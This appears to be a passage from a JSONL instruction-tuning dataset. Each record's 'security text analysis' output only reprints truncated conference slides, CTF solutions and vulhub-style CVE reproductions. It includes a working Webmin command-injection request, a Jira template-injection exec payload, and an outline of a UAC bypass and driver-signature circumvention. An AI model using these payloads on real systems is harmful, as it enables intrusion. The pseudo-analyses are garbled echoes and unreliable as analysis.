most perfect and unbreakable crypto you can get (one time pads are considered the ultimate crypto)  Key management is a bitch, and may render this impractical for modern humans NPC Demo NPC Demo Q & A Q & A  We will spank au", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDCFluX in: Moon-Bouncer DCFluX in: Moon-Bouncer Presented By: Matt Krick, DCFluX  K3MK Chief Engineer, New West Broadcasting Systems, Inc. DEFCON 18; Las Vegas, NV Track 4 Friday July 30, 2010; 17:00  17:50 In A.D. 2101 War Was Beginning Hidden Agenda 1. A Series of Tubes 2. Natural Satellites and Moon Bouncing 3. Artificial Satellites and cleaver ways to use them 0. About the Author 5. Other stuff you can blame me for 4. Weather balloons as satellites  Matt Krick  DCFluX  Video Editor  Broadcast Engineer  1998 to Present  K3MK  Licensed to Transmit, 1994 to Present 0. About the Author 0. About the Author Triodes and Tetrodes 1. A Series of Tubes Magnetron (Radar Type) 1. A Series of Tubes Magnetron (Radar Type) Magnet 1. A Series of Tubes Magnetron (Microwave Oven Type) 1. A Series of Tubes Klystron Tube 1. A Series of Tubes Klystron Tube (Reflex) 1. A Series of Tubes Traveling Wave Tube 1. A Series of Tubes Traveling Wave Tube Amplifier 1. A Series of Tubes Hydrogen MASER 1. A Series of Tubes Hydrogen MASER 1. A Series of Tubes 2. Natural Satellites and Moon Bouncing 2. Natural Satellites and Moon Bouncing Earths Moon  Diameter: 3,474.2 km 2. Natural Satellites and Moon Bouncing Project Diana  Frequency: 111.50 MHz Perigee Apogee 40m (7 MHz) 230.5 dB 232.7 dB 10m (30 MHz) 242.5 dB 244.8 dB 6m (54 MHz) 247.5 dB 249.8 dB 2m (148 MHz) 256.7 dB 259.0 dB 70cm (450 MHz) 266.0 dB 268.3 dB 33cm (928 MHz) 272.6 dB 274.9 dB 23cm (1.3 GHz) 275.4 dB 277.7 dB 13cm (2.45 GHz) 281.2 dB 283.4 dB 3cm (10.5 GHz) 294.0 dB 296.2 dB 2. Natural Satellites and Moon Bouncing Moon Bounce Path Attenuation  8000 W Transmitter (+69 dBm)  111.5 MHz EME Path (-256.7 dB)  64 Dipole Array (+24 dB)  Feed Line Loss (-4.2 dB) 69 + 24 - 4.2 - 256.7 + 24  4.2 = -148.1 dBm 2. Natural Satellites and Moon Bouncing Project Diana Path Loss 2. Natural Satellites and Moon Bouncing Increasing Receiver Sensitivity  Decrease Thermal Noise  Decrease Bandwidth  Decrease System Noise Figure 2. Natural Satellites ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 关于作者 > 译者[@Snowming](https://github.com/Snowming04) ![](../images/introduction/author.PNG)<br> 作者 Peter Kim 从事信息安全行业超过14年在渗透测试/红队领域工作超过12年 他曾服务于多家公用事业公司财富1000娱乐公司政府机构以及大型金融机构虽然他最为知名的是<The Hacker Playbook>一书系列但他却热衷于建立一个安全的安全社区指导学生并培训他人他创立并维护着南加州最大的一家技术安全俱乐部LETHALwww.meetup.com/LETHAL 并在他的网站 LETHAL Securitylethalsecurity.com进行私人培训同时他还经营一家渗透测试公司名为Secure Planetwww.SecurePla.net Peter 在他的The Hacker Playbook系列的主要目标是向读者灌输激情让他们跳出思维定式随着安全环境不断变化他希望帮助下一代人建立专业的安全知识和素养 如有以下任何一种情况请随时联系 Peter Kim - 关于这本书的问题book@thehackerplaybook.com - 有关私人培训或渗透测试的咨询secure@securepla.net - Twitter@hackerplaybook", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMJ0011 th_decoder@126.com 逆向Windows 8: 内核安全特性拾趣 1 目的 逆向Windows 8 Release Preview版本 发现一些新的用于防御或缓和内核漏洞攻击的安全特性 目标 主要关注ntoskrnl 工具 IDA Pro/Hex-rays/windbg 议程 2  禁止零页内存分配  禁止Win32k系统调用  安全性故障中断  不可执行的非分页池  使用Intel Secure Key 技术  使用Intel SMEP 技术 Windows8对抗内核漏洞利用的安全特性 3  零页内存Windows上供 16位虚拟机NTVDM使用确保16位代码 正常运行  内核漏洞攻击技巧通过ZwAllocateVirtualMemory等系统调用可 以在进程中分配出零页内存  触发未初始化对象指针/数据指针引用漏洞或辅助漏洞攻击  案例 CVE-2010-4398 N-Protect TKRgAc2k.sys kernel 0day(POC2010)  Window 8 上禁止进程申请低地址内存(0x0~0x10000)  EPROCESS->Flags.VdmAllowed 禁止零页内存分配 4  Windows 8 上 16位虚拟机默认禁用开启需要管理员权限 禁止零页内存分配 5  Windows8在所有可能的内存分配位置检查零页分配  MiCreatePebOrTeb进线程启动创建PEB或TEB时  MiMapViewOfImageSection->MiIsVaRangeAvailable: 映射镜像内存区时  MiMapViewOfDataSection/MiMapViewOfPhysicalSection 映射数据内存区时  MmMapLockedPagesSpecifyCache/MmMapLockedPages-> MiMapLockedPagesInUserSpace 映射用户地址时内核自身未这样使用但其他驱动使用时会限制  NtAllocateVirtualMemory:分配进程内存 禁止零页内存分配 6 禁止Win32k系统调用  EPROCESS->Flags2.DisallowWin32kSystemCalls  实现在KiFastCallEntry(2)->PsConvertToGuiThread 禁止Win32k系统调用 7  禁用win32k 系统调用的作用  Win32k.sys Windows内核漏洞高发调用不受进程权限限制  MS11-087 Trojan.win32.Duqu 字体解析漏洞  目前应用沙箱的防御策略: Job UI限制 效果不佳  禁用win32k系统调用可以有效防御一切win32k.sys相关0day 无需内核驱动配置简单  防御非0day的USER/GDI相关技巧突破沙箱 禁止Win32k系统调用 8  PsConvertToGuiThread : GUI线程首次调用win32k system call时 切换线程状态  应用DisallowWin32kSystemCalls标志后禁止切换任何对 USER32/GDI32相关调用都会失败  三种方式获得此标志  1.IEFO注册表 :  HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\MitigationOptions (0x10000000)  在进程创建过程NtCreateUserProcess->PspAllocateProcess-> PspApplyMitigationOptions应用到标志位上  2.文档化的API:SetProcessMitigationPolicy  实际调用NtSetInformationProcess->ProcessMitigationPolicy设置标志 位  3.从父进程继承 禁止Win32k系统调用 9  Windows 8 中加入的新的中断: Int 0x29  Windows8的内核和其他驱动程序在发生安全性故障时使用将直接 引发BSOD  最常见的使用地方在双向链表的链接/脱链前Windows8的OS加载 器内核和驱动程序中在所有双向链表的使用上都加入了这个处理  被称为Safe Linking & Safe Unlinking  安全链接例子:IoRegisterFsRegistrationChangeMountAware  安全脱链例子:IoUnregisterFileSystem  防御利用篡改链接后脱链/链接形成任意地址写入 安全性故障中断 10 安全性故障中断 安全脱链机制触发int 0x29中断示例: IoUnreg", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMass$Scanning$the$Internet$ Tips,$tricks,$results$ $ Robert$Graham$ Paul$McMillan$ Dan$Tentler$ 0.0.0.0/0$ Why$scan$the$Internet$(defensive)$  How$many$systems$are$vulnerable$to$ Heartbleed?$  How$many$systems$can$be$used$for$NTP$ amplificaKon?$  How$many$systems$vulnerable$to$DLLink$ router$vulnerability/$  Survey$all$SSL$cerKficates$in$use$ Why$scan$the$Internet$(offensive)$  Uh,$its$the$deepnet$  Pick$a$random$port,$run$masscan$with$ banners,$and$you$find$something$hackable$ within$minutes$ Why$scan$the$Internet$(really)$  Because$its$fun$  Because$its$informaKve$  You$cant$appreciate$how$small$the$Internet$is$unKl$ youve$scanned$0.0.0.0/0$  Itll$make$you$famous$  Pick$a$target,$like$a$Siemens$control$system$  Scan$the$Internet$for$it$  Do$a$BlackHat$talk$  Get$in$the$news$ TheoreKcal$Physical$infrastructure$  Packets$have$overhead$  Ethernet$packets$have$44$bytes$overhead$  TCP$SYN$packets$are$40$bytes$  Max$rate$for$1Lgbps$Ethernet$  476Lmbps$of$actual$traffic$  524Lmbps$of$Ethernet$overhead$  1,488,000$packets/second$ hap://blog.erratasec.com/2013/10/whatsLmaxLspeedLonLethernet.html$ ISP$billing$  Some$ISPs$measure$Ethernet$rate$  Charge$you$for$the$full$1Lgbps$  Some$ISPs$measure$WAN$rate$  Charge$you$for$~600Lmbps$  Some$ISPs$dont$see$the$small$packets$  This$one$Kme,$ISP$didnt$see$our$outbound$traffic,$only$ inbound$  Some$ISPs$are$unmetered$  Yea!$ PracKcal$Physical$Infrastructure$  VPS$can$strain$under$the$load$of$small$packets$  Ethernet$switches$struggle$with$small$packets$  Above$500kpps$is$ohen$difficult$  Turning$off$flowLcontrol$may$help$  Some$parts$may$drop$packets$  Transmijng$500kpps$doesnt$mean$all$packets$are$ reaching$the$Internet$  I$usually$do$~150kpps$  When$I$dont$parKcularly$care$about$speed$ Abuse$complaints$  You$will$get$abuse$complaints$  Your$ISP$will$get$upset$  Some$things$are$worse$than$others$  Heartbleed$scans$generate$abuse$complaints$ weeks$later$  HTTP$scans$get$you$put$on$fail2ban$lists$  Snort/emergingthreat$rules$generate$a$lot$of$ c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Atlassian Jira 模板注入漏洞CVE-2019-11581 Atlassian Jira是企业广泛使用的项目与事务跟踪工具被广泛应用于缺陷跟踪客户服务需求收集流程审批任务跟踪项目跟踪和敏捷管理等工作领域 多个版本前存在利用模板注入执行任意命令 - 4.4.x - 5.x.x - 6.x.x - 7.0.x - 7.1.x - 7.2.x - 7.3.x - 7.4.x - 7.5.x - 7.6.x before 7.6.14 (the fixed version for 7.6.x) - 7.7.x - 7.8.x - 7.9.x - 7.10.x - 7.11.x - 7.12.x - 7.13.x before 7.13.5 (the fixed version for 7.13.x) - 8.0.x before 8.0.3 (the fixed version for 8.0.x) - 8.1.x before 8.1.2 (the fixed version for 8.1.x) - 8.2.x before 8.2.3 (the fixed version for 8.2.x) 参考资料 - https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html - https://jira.atlassian.com/browse/JRASERVER-69532 - https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw ## 环境搭建 执行如下命令启动一个Jira Server 8.1.0 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:8080`会进入安装引导切换中文VPS条件下选择将其设置为我第一项去Atlassian官方申请一个Jira Server的测试证书不要选择Data Center和Addons 然后继续安装即可这一步小内存VPS可能安装失败或时间较长建议使用4G内存以上的机器进行安装与测试请耐心等待 ![](7.png) 添加 SMTP 电邮服务器 `/secure/admin/AddSmtpMailServer!default.jspa` ![](8.png) 进入系统设置 `/secure/admin/ViewApplicationProperties.jspa` 开启联系管理员表单 ![](9.png) 貌似还要有项目才能玩所以随便创建一个示例就行了,然后你就可以愉快的玩耍了 ## 漏洞复现 PoC 和 CVE-2019-3396 一样 ``` $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('calc').toString() ``` Linux 没有 calc, 所以 ``` $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('whoami').toString() ``` 运行`poc.py`或者进入`/secure/ContactAdministrators!default.jspa` 直接提交 PoC ![](11.png) ![](12.png) 如果没看到 smtpd 有数据那么就可能卡队列了 电邮队列瞅一瞅 `/secure/admin/MailQueueAdmin!default.jspa` ![](13.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMobile Privacy: Tor On The iPhone And Other Unusual Devices Marco Bonetti - CutAway s.r.l. whoami Marco Bonetti Security Consultant @ CutAway s.r.l. mbonetti@cutaway.it http://www.cutaway.it/ Tor user & researcher @ SLP-IT http://sid77.slackware.it/ http://www.slackware.it/ http://twitter.com/_sid77/ Outline Mobile Phones (In)Security Tor On Mobile Phones And Other Strange Devices Tor On The Chumby One Tor On Maemo And The Nokia N900 Orbot: Tor On Android Mobile Tor: Tor On The iPhone Mobile Phones (In)Security Mobile Phones Growth Computational power High speed data networks Real operating system Phones Are Personal Raise hand who does not own a mobile phone We take them everywhere we go Never leave the house without it ;-) Phones Are Critical Call logs Address book E-mail SMS GPS data Documents Calendar events Calendar tasks Browser history Browser cache Too Much Trust Users trust their phone Phones trust the operator Operators trust themselves Users trust operators as well Too Much Trust Too Much Heterogeneity Closed communication protocols Heterogeneous networks Fragmented hardware landscape Many different operating systems Architectural Issues Made for chatting and texting Keyboards adopted to the model Difficult passwords are... difficult! Architectural Issues Phones are mobile devices Screen size is limited Checking important stuff is nearly impossible! Who Own The Device? Manufacturer / vendor Apple iPhone banned for ministers (CBS, 2010) Exercising Our Remote Application Removal Feature (android-developers, 2010) Carrier operator BlackBerry update bursting with spyware (The register, 2009) Application developer iPhone Privacy (BlackHat DC, 2010) End user We're here! Data (In)Security Data is stored in cleartext Blackberry and Nokia allows some sort of encryption Data access is an all or nothing approach Need permissions fine tuning Communication (In)Security GSM has been broken UMTS is not feeling very well SMS has been abused MMS remote exploit for Windows", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n滴滴出行 基于符号执行的反混淆方法研究 演讲人糜波 2019 PART 01 混淆框架简介 目录 CONTENTS PART 02 混淆技术原理 PART 03 反混淆技术原理 PART 04 后续的工作 01 02 03 04 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. PART.01 混淆框架简介  混淆技术是基于OLLVM开源代码 https://github.com/obfuscator-llvm/obfuscator  是瑞士西北应用科技大学于2010年6月份发起的一个项目该项目旨在提供一套开源的 基于LLVM的代码混淆工具以增加逆向工程的难度  LLVM是开源的编译器框架LLVM出现也是为了替换与系统紧耦合的GCC编译器  LLVM分为三个独立模块高级语言解析中间语言IR处理目标机器语言生成三个 模块都具备可扩展性  高级语言支持C/C++OC等目标指令支持x86ARMmips等混淆是基于IR进行的扩展 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. PART.02 混淆技术原理  OLLVM4.0主要支持三种混淆特性 a. 控制流平坦化 b. 虚假控制流 c. 指令替换  控制流平坦化引自freebuf)  虚假控制流引自freebuf)  指令替换引自freebuf)  混淆技术原理虚假控制流  引入不透明谓词  (y <10 || x *(x + 1)%2 == 0)  https://github.com/obfuscator-llvm/obfuscator/wiki/Bogus-Control-Flow  混淆技术原理指令替换 加法 a = b + c a = b - (-c) a = -(-b + (-c)) r = rand (); a = b + r; a = a + c; a = a - r r = rand (); a = b - r; a = a + b; a = a + r 减法与或异或运算 https://github.com/obfuscator-llvm/obfuscator/wiki/Instructions-Substitution  混淆技术原理控制流平坦化  有块变量可能是堆栈或寄存器变量  初始化后的块变量经过二分搜索执行块  当前块修改块变量决定下一步执行哪个 块  原始代码中的分支会影响块变量赋值 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED TITLE TEXT, CLICK ON ADD RELATED TITLE WORDS. PART.03 反混淆技术原理  认识符号执行引擎  用符号代替变量  模拟程序执行  约束求解  我使用的是符号执行引擎释angr https://github.com/angr/angr  去流程平坦化思路  找到所有真实块  从序言块符号执行  到第一个真实块即为序言块的后继  再递归找这个真实块的后继  遇到分支进入递归执行  递归返回时修改分支条件继续执行  输出patch汇编 or 其他  寻找基本块思路 Case 1  序言块是真实块后继是主分发器  后继是主预分发器都是真实块  没有后继的是return块也是真实块  寻找基本块思路 Case 2  两个以上主分发器  手工指定主分发器地址  人工的智能往往最简单有效  寻找基本块思路 Case 3  真实块被优化成多个  在BEQ或BNE和主预分发器之 间的是真实块  为什么从函数开头符号执行  和块变量比较的可能不是常量  这些block value在序言块中初始化  识别原始分支  单纯控制流平坦化识别相对容易  ARM 32遇到ITT指令即可认为是是原始 分支  加上虚假控制流流程变得复杂可以考 虑使用约束求解还在研究中  输出patch汇编or其他  指令空间不够  输出GDL文件用wingraph打开  最终效果  混淆代码vs还原的代码  最终效果  混淆代码vs还原的代码 CLICK ADD RELATED TITLE TEXT, AND CLICK ADD RELATED TITLE TEXT, CLICK ADD RELATED ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 静态分析综合题目 ## 2017 ISCC Crackone 利用 jadx 进行反编译可以得到程序的基本逻辑如下 - 对用户输入的内容进行 base64 编码然后在指定长度位置处插入`\\r\\n` 这个似乎并没有什么乱用 - 之后程序将编码后的内容传递给 so 中的 check 函数这个函数的逻辑如下 ```c env = a1; len = plen; str = pstr; v7 = malloc(plen); ((*env)->GetByteArrayRegion)(env, str, 0, len, v7); v8 = malloc(len + 1); memset(v8, 0, len + 1); memcpy(v8, v7, len); v9 = 0; for ( i = 0; ; ++i ) { --v9; if ( i >= len / 2 ) break; v11 = v8[i] - 5; v8[i] = v8[len + v9]; v8[len + v9] = v11; } v8[len] = 0; v12 = strcmp(v8, \"=0HWYl1SE5UQWFfN?I+PEo.UcshU\"); free(v8); free(v7); return v12 <= 0; ``` 不难看出程序就是直接将 base64 之后的字符串的两半分别进行适当的操作这里我们很容易写出 python 对应的恢复代码如下 ```python import base64 def solve(): ans = '=0HWYl1SE5UQWFfN?I+PEo.UcshU' length = len(ans) flag = [0] * length beg = 0 end = length while beg < length / 2: end -= 1 flag[beg] = chr(ord(ans[end]) + 5) flag[end] = ans[beg] beg += 1 flag = ''.join(flag) print base64.b64decode(flag) if __name__ == \"__main__\": solve() ``` 对应的结果如下 ```shell  2017ISCC python exp.py flag{ISCCJAVANDKYXX} ``` ## 2017 NJCTF easycrack 通过简单逆向可以发现程序的基本逻辑如下 1. 监控界面文本框如果文本框内容改变则调用 native `parseText` 函数 2. `parseText` 的主要功能如下 1. 首先调用 java 层的函数 messageMe 获取一个字符串 mestr这个函数的逻辑基本是 1. 依次将 packagename 的最后一个 `.` 后面的字符串的每一个与 51进行异或将结果拼接起来 2. 然后以 mestr 长度为周期将两者进行异或核心逻辑 `str[i + j] = mestr[j]  iinput[i + j];` 3. 继而下面以 `I_am_the_key` 为密钥使用 RC4 加密对该部分进行加密然后将结果与最后的 `compare` 比较这里猜测的依据如下 1. 在 init 函数中有 256 这个关键字而且基本就是 RC4 密钥的初始化过程 2. crypt 函数显然就是一个 RC4 加密函数明显就是 RC4 的加密逻辑 解密脚本如下 ```python from Crypto.Cipher import ARC4 def messageme(): name = 'easycrack' init = 51 ans = \"\" for c in name: init = ord(c)  init ans += chr(init) return ans def decrypt(cipher,key): plain =\"\" for i in range(0,len(cipher),len(key)): tmp = cipher[i:i+len(key)] plain +=''.join(chr(ord(tmp[i])ord(key[i])) for i in range(len(tmp))) return plain def main(): rc4 = ARC4.new('I_am_the_key') cipher = 'C8E4EF0E4DCCA683088134F8635E970EEAD9E277F314869F7EF5198A2AA4' cipher = ''.join(chr(int(cipher[i:i+2], 16)) for i in range(0, len(cipher)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Webmin 远程命令执行漏洞CVE-2019-15107 Webmin是一个用于管理类Unix系统的管理配置工具具有Web页面在其找回密码页面中存在一处无需权限的命令注入漏洞通过这个漏洞攻击者即可以执行任意系统命令 参考链接 - https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html - https://www.exploit-db.com/exploits/47230 - https://blog.firosolutions.com/exploits/webmin/ ## 环境搭建 执行如下命令启动webmin 1.910 ``` docker compose up -d ``` 执行完成后访问`https://your-ip:10000`忽略证书后即可看到webmin的登录页面 ## 漏洞复现 参考链接中的数据包是不对的经过阅读代码可知只有在发送的user参数的值不是已知Linux用户的情况下而参考链接中是`user=root`才会进入到修改`/etc/shadow`的地方触发命令注入漏洞 发送如下数据包即可执行命令`id` ``` POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60 user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2 ``` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking travel routers like its 1999 Mikhail Sosonkin Mikhail Sosonkin Synack leverages the best combination of humans and technology to discover security vulnerabilities in our customers web apps, mobile apps, IoT devices and infrastructure endpoints Director of R&D Always a Student @hexlogic mikhail@synack.com http://debugtrap.com Why do this? Breaking in. Show me the bugs! The End. $ cat agenda | wc -l 4 We all just hack for fun right? I travel a lot I work in cafes I do security things $ man y No manual entry for y Cuz, hackers gonna hack... RAVPower FileHub Plus HooToo TripMate Elite Travel Wireless Router TP-Link AC750 Wireless Wi-Fi Travel Router And about 377 more results on Amazon. The market delivers... Bridging networks/MAC spoofing Layer of network protection Connect one device, connect them all Convenient small form factor Battery pack included Why do this? The unboxing We want bugs! The End $ cat agenda | wc -l 3 Peeking a few extra bytes... PORT STATE SERVICE 0/tcp filtered unknown 80/tcp open http 81/tcp open hosts2-ns 5880/tcp open unknown 8201/tcp open trivnet2 HTTP/1.1 200 OK Content-Type: text/html Accept-Ranges: bytes ETag: \"1800253254\" Last-Modified: Mon, 29 Feb 2016 07:23:52 GMT Content-Length: 3940 Date: Wed, 28 Jun 2017 12:13:26 GMT Server: lighttpd/1.4.28 HTTP/1.1 200 OK Server: vshttpd Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-length: 123 Content-type: text/xml;charset=UTF-8 Set-cookie: SESSID=Xqo72s... Date: Wed, 28 Jun 2017 12:13:26 GMT nmap -p0-65535 192.168.1.1 Right-click -> inspect HTTP/1.1 200 OK Server: vshttpd Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-length: 8338 Content-type: text/html Set-cookie: SESSID=eXXzgZIWg4jnnXGidAVQpRB6joaM7D7lr3IGWtz7oRuJE; Date: Sat, 24 Jun 2017 19:38:27 GMT DATA SAVER 27.XX.XX.222 222.XX.XX.27.ap .yournet.ne.jp FreeBit Co.,Ltd. 2017-06-24 19:38:32 GMT Japan DATA SAVER 27.XXX.XX.244 244.XX.XXX.27.a p.yournet.ne.jp FreeBit Co.,Ltd. 2017-03-20 17:11:29 GMT Japan IOVST", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 无线攻击工具 | Wireless Attacks | | | | | | | :-----------------------------------------------: | :---------: | :------: | :------: | :-----------------------------: | :---------------: | | Aircrack-ng | Asleap | Bluelog | BlueMaho | Bluepot | BlueRanger | | Bluesnarfer | Bully | coWPAtty | crackle | eapmd5pass | Fern Wifi Cracker | | [Ghost Phisher](Ghost-Pisher.md) | GISKismet | Gqrx | gr-scan | hostapd-wpe | kalibrate-rtl | | KillerBee | Kismet | mdk3 | mfcuk | [mfoc](mfoc.md) | mfterm | | Multimon-NG | PixieWPS | Reaver | redfang | RTLSDR Scanner | Spooftooph | | Wifi Honey | wifiphisher | Wifitap | Wifite | | |", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKenny@Choot.org Kill AV in x64 Whats AV? Whats AV? AV AV 雖然她們 伴隨著 青春歲月 深埋你我 的 D:\\ But~ 今天主角是. 防毒Girl 防毒Girl 噴鼻血(圖) 以上純屬唬爛 演講開始 1. UAC Bypass 2. 數位簽章-Secret 3. Kill AV 主題 UAC Bypass 據說漏洞發現作者是在向微軟回報而 未被重視的情況下憤怒的公開了原 始程式碼和實作Demo 小故事 http://www.pretentiousname.com/misc/win7_uac_whitelist2.html 利用條件 1某些程式在執行時會自動賦予為管理者權限,而不 會觸發UAC 2某些程式可以建立特定的Com Object且不會有 UAC提示 3某些Com Object若建立成功則擁有管理者權限 4 子行程會有與父行程相同權限(權限繼承) .. .. Windows/System32/sdclt.exe Windows/System32/shrpubw.exe Windows/System32/slui.exe Windows/System32/SndVol.exe Windows/System32/syskey.exe Windows/System32/sysprep/sysprep.exe .. .. 管理者權限白名單(1) 建立ComObject白名單 (2).. .. Calc.exe Taskmgr.exe Notepad.exe Explorer.exe .. .. Code Injection 程式碼 WriteProcessMemory + CreateRemoteThread Explorer.exe 這段程式碼會新建一個IFileOperation Object並 擁有管理員權限但不觸發UAC IFileOperation Object Pattern 3AD05575-8857-4850-9277-11B85BDB8E09 IFileOperation Object(Com object) Windows Vista版本之後檔案操作的框架 複製剪下刪除等操作都透過它 CodeInjection IfileOperation Copy Cryptbase.dll (Evil) Save System32 \\sysprep Explorer.exe Exec DLL Hijack Cryptbase.dll (Evil) Load Admin Code sysprep.exe Demo 一秒變Admin 數位簽章 數位簽章檢查機制 In Kernel Mode x64 驅動程式 載入 簽章 檢查 載入成功 載入失敗 How to Bypass 數位簽章檢查!? 一正常方法 暫時性關閉數位簽章檢查 二邪惡方法 1.替換BootLoader Bypass 數位簽章 & PatchGuard 2.利用已公布之漏洞+白名單數位簽章 暫時性關閉驅動簽章檢查 於電腦的 BIOS 自我檢測完成之後 狂按 F8 鍵等到出現進階開機選 項選擇停用驅動程式強制簽章 啟動 Windows 這叫 Binary Patch 系統檔案 邪惡方法一 一修改微軟的系統檔案 1.winload.exe (1)檢查OS檔案是否被修改 (2)數位簽章檢查機制 技術原理-Binary Patch 2.ntoskrnl.exe(PatchGuard) 假裝安全模式騙過系統 二bcdedit 新增自定義開機導引 提供Script + Dup2 的Patch 缺點 一動作太大會被AV偵測 二必須重開機才有效果! 邪惡方法二 利用已公布之漏洞 加上正式簽章Bypass 資料來源 http://j00ru.vexillium.org/?p=377 A quick insight into the Driver Signature Enforcement j00ru 2010/06/19 Bypass數位簽章原理 nt!MmLoadSystemImage nt!MiObtainSectionForDriver nt!MiCreateSectionForDriver nt!MmCheckSystemImage nt!NtCreateSection nt!MmCreateSection nt!MiValidateImageHeader nt!SeValidateImageHeader  nt!_g_CiCallbacks[0] 攻擊目標-關鍵變數 nt!g_CiEnabled 若值等於 1 則開啟數位簽章檢查 若值等於 0 則關閉檢查 條件一正式簽章驅動 條件二任意寫入漏洞 /* drivecry", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Dozen Years of Shellphish From DEFCON to the Cyber Grand Challenge Zardus HEX on the beach ??? Giovanni Vigna Christopher Kruegel zanardi void UC Santa Barbara zanardi nullptr void balzaroth sicko irish SIMULATION 2004 UC Santa Barbara nullptr zanardi void balzaroth sicko irish TU Vienna void engiman pizzaman SIMULATION 2005 virus weaver marco beetal Northeastern and boston university UC Santa Barbara zanardi balzaroth sicko irish TU Vienna void nullptr engiman pizzaman odo adamd giullo voltaire bboe virus weaver marco beetal void pizzaman gianluca zardus cavedon spermachine kirat hacopo reyammer anton00b mw engiman nullptr SIMULATION 2006 - 2011 collin Northeastern and boston university UC Santa Barbara zanardi balzaroth sicko irish virus weaver marco beetal void odo adamd giullo voltaire bboe pizzaman gianluca zardus cavedon spermachine kirat hacopo reyammer anton00b engiman nullptr mw collin pizzaman acez fish cao salls subwire mossberg crowell nezorg rhelmot jay vitor SIMULATION 2011 - 2014 mw collin Eurecom ASU UC London Northeastern and boston university UC Santa Barbara zanardi sicko irish virus weaver marco beetal mossberg crowell nezorg rhelmot jay vitor void odo giullo voltaire bboe balzaroth adamd gianluca zardus cavedon spermachine kirat hacopo reyammer anton00b engiman nullptr mw collin pizzaman acez fish cao salls subwire mike_pizza donfos double acez balzaroth adamd gianluca SIMULATION 2015 Eurecom ASU UC London Northeastern and boston university UC Santa Barbara zanardi mossberg crowell nezorg rhelmot jay void odo zardus cavedon spermachine kirat hacopo reyammer anton00b engiman nullptr mw irish weaver giullo voltaire virus sicko marco beetal vitor bboe collin pizzaman fish cao salls subwire mike_pizza donfos double acez balzaroth adamd gianluca SIMULATION Modern day Eurecom ASU UC London Northeastern and boston university UC Santa Barbara zanardi mossberg crowell nezorg rhelmot jay void odo zardus cavedon spermachine kirat hacopo reyammer anton00b", "category": "text_analysis", "source": "security_papers"}
